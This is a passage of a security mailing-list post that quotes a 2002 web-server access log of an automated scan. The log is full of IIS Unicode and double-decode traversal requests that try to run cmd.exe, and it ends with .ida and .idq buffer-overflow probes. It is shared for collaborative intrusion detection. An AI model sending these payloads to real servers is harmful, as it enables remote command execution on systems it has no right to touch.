> /cgi-bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /cgi-bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
>
/exchange/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd
> .exe?/c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
>
/exchange/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+d
> ir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /exchange/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:15 +0200] "HEAD
> /exchange/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /exchange/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /exchange/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /exchange/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /exchange/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
>
/msadc/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.ex
> e?/c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /msadc/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /MSADC/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /msadc/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-"
"-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
>
/msadc/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd
> .exe?/c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /msadc/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
>
/msadc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /msadc/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
400
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /MSADC/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
400
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /msadc/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /MSADC/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /msadc/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /msadc/..%u002f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-" "-"
"-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /msadc/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /msadc/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /MSADC/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /msadc/..%u005c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-" "-"
"-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /msadc/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /msadc/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /msadc/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /msadc/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
>
/PBServer/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd
> .exe?/c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /PBServer/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
>
/PBServer/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+d
> ir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /PBServer/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
400
> 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /PBServer/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:16 +0200] "HEAD
> /PBServer/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /PBServer/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /PBServer/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /PBServer/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /PBServer/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /PBServer/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /PBServer/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
>
/Rpc/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?
> /c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /Rpc/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /Rpc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /Rpc/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /Rpc/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /Rpc/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /Rpc/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /Rpc/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /Rpc/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /Rpc/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /Rpc/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /Rpc/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
>
/samples/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.
> exe?/c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
>
/samples/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+di
> r HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /samples/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /samples/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /samples/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /samples/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /samples/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
> /samples/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:17 +0200] "HEAD
>
/script/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.e
> xe?/c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
>
/script/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cm
> d.exe?/c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
> /script/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
>
/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.
> exe?/c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
> /script/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
>
/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+d
> ir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
> /scripts/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
>
/scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/c
> md.exe?/c+dir HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
> /scripts/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0
"-"
> "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
> /scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
> /scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-"
"-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
> /scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
> /scripts/..%u002f../..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
> /scripts/..%u002f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-" "-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
> /scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
> /scripts/..%u005c../..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
> /scripts/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
0
> "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
> /scripts/..%u005c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 0 "-" "-"
> "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
>
/scripts/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c%20dir%2
> 0C:\ HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
>
/scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20
> C:\ HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
>
/scripts/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c%20dir%20C:\
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:18 +0200] "HEAD
>
/scripts/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c%20dir%20C:\
> HTTP/1.0" 400 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:19 +0200] "GET /NULL.printer
> HTTP/1.1" 404 295 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:19 +0200] "GET
>
/NULL.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAA=a HTTP/1.0" 404 279 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:11:19 +0200] "GET /NULL.idq?HTTP/1.1 404
> Not
>
FouAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=a HTTP/1.0" 404 279
> "-" "-" "-"
>
>
>
>
> --
> ---------------------------------------------------------------
> jullrich at sans.org             Collaborative Intrusion Detection
join http://www.dshield.org
>
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list
>





More information about the list mailing list